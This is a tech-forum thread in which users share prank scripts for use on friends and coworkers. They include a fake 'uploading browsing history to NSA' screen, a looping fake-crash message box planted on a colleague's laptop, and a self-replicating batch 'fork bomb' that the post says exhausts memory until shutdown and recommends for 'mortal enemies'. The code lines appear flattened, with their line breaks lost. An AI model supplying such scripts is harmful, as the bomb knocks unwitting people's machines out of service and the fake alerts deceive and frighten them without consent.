Jump to content

Welcome to my Prank thread!

 

So, you want to screw with your friend? Or maybe you just want to get back at an annoying coworker? Then these simple batch files are for you!

 

The first prank we have is what I like to call the NSA scare.

@[member=Echo] offcolortitle Uploading browsing history to NSA servers!set qz=0cls:aif %qz%==99999 goto bset /a qz= %qz%+1echo %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM%goto a:becho Upload complete!pause

It's obvious why this would scare someone, especially someone who only uses their computer to enjoy the more... morally grey... part of the web.

 

This next prank, however, is not so harmless. This is known as a batch bomb, which is a self replicating, self calling batch file that spams them with the message "LOL"

@[member=Echo] off:aset file=%RANDOM%type "%~nx0" > "%file%.bat"start %file%.batecho LOLgoto a

there is no stopping this program, save for a shut down or crash. Use only for mortal enemies.

 

CAUTION: this file eats ram fast. Insert a pause command in the loop if you wish to test it yourself.

 

I have more prank code, but I am out of time for now. come back for more later!

If you have comments, or your own ideas, post them below!

Link to comment
https://linustechtips.com/topic/488769-batch-pranks/
Share on other sites

Link to post
Share on other sites

HAH

Thank you sir

CPU - Intel Core i7 3770K @ 4.60GHz 1.264v | RAM - Corsair Dominator Platinum 16.0GB (2x8GB) | Motherboard - ASUS P8Z77 WS | Graphics - EVGA NVIDIA GeForce GTX 960 | Storage -  120 GB Samsung 840 EVO | PSU - Corsair RM650 | Case - Corsair 550D

Link to comment
https://linustechtips.com/topic/488769-batch-pranks/#findComment-6559482
Share on other sites

Link to post
Share on other sites

Friend was bored at internship so he made this:

x=msgbox("PC has crashed. Want to delete system32?", 0+16, "Error 37")

But this line was repated like 100 times in the script, meaning you press OK, nothing happens and another textbox with the same thing appears.

It's not harmful at all, but we put it on another colleague's laptop and he freaked out :P (You can easily stop the script via task manager though)

"We're all in this together, might as well be friends" Tom, Toonami.

 

mini eLiXiVy: my open source 65% mechanical PCB, a build log, PCB anatomy and discussing open source licenses: https://linustechtips.com/topic/1366493-elixivy-a-65-mechanical-keyboard-build-log-pcb-anatomy-and-how-i-open-sourced-this-project/

 

mini_cardboard: a 4% keyboard build log and how keyboards workhttps://linustechtips.com/topic/1328547-mini_cardboard-a-4-keyboard-build-log-and-how-keyboards-work/

Link to comment
https://linustechtips.com/topic/488769-batch-pranks/#findComment-6559496
Share on other sites

Link to post
Share on other sites

The first prank we have is what I like to call the NSA scare.

I think this would be scarier for some people:

title Sending browsing history to your wife!echo www.naughtysite.comsleep 2echo www.evenworsethanthat.comsleep 2echo www.ashleymadison.comsleep 2echo done pause

AMD Ryzen 7800 X3D, MSI B650 Project Zero, Antec C5, Gigabyte RTX 4080 Super Aero

 

Nikon D500 | Nikon 300mm f/4 PF  | Nikon 200-500 f/5.6 | Nikon 50mm f/1.8 | Tamron 70-210 f/4 VCII | Sigma 10-20 f/3.5 | Nikon 17-55 f/2.8 | Tamron 90mm F2.8 SP Di VC USD Macro | Neewer 750II

Link to comment
https://linustechtips.com/topic/488769-batch-pranks/#findComment-6559498
Share on other sites

Link to post
Share on other sites

it is actually legal, yes.

In that case, what would be really funny is if someone wrote one of these to say "Error, computer needs oil change. Please pour in through the vents" Just to see how many people would do it.

 

edit: I'd feel bad for all the people paid to repair it though.

Don't do drugs. Do hugs!

 

Link to comment
https://linustechtips.com/topic/488769-batch-pranks/#findComment-6559526
Share on other sites

Link to post
Share on other sites

can confirm the batch bomb. I also had an entire desktop full of batch files.

 

10/10. would try again.

Gaming - Ryzen 9800X3D | 64GB 6400mhz cl30 9070 XT

Homelab - many servers...constantly changing. 

3970X/256GB - 5950X/128GB ECC - 5600G/96GB - 3400GE/16GB - 3400GE/16GB

Link to comment
https://linustechtips.com/topic/488769-batch-pranks/#findComment-6559602
Share on other sites

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×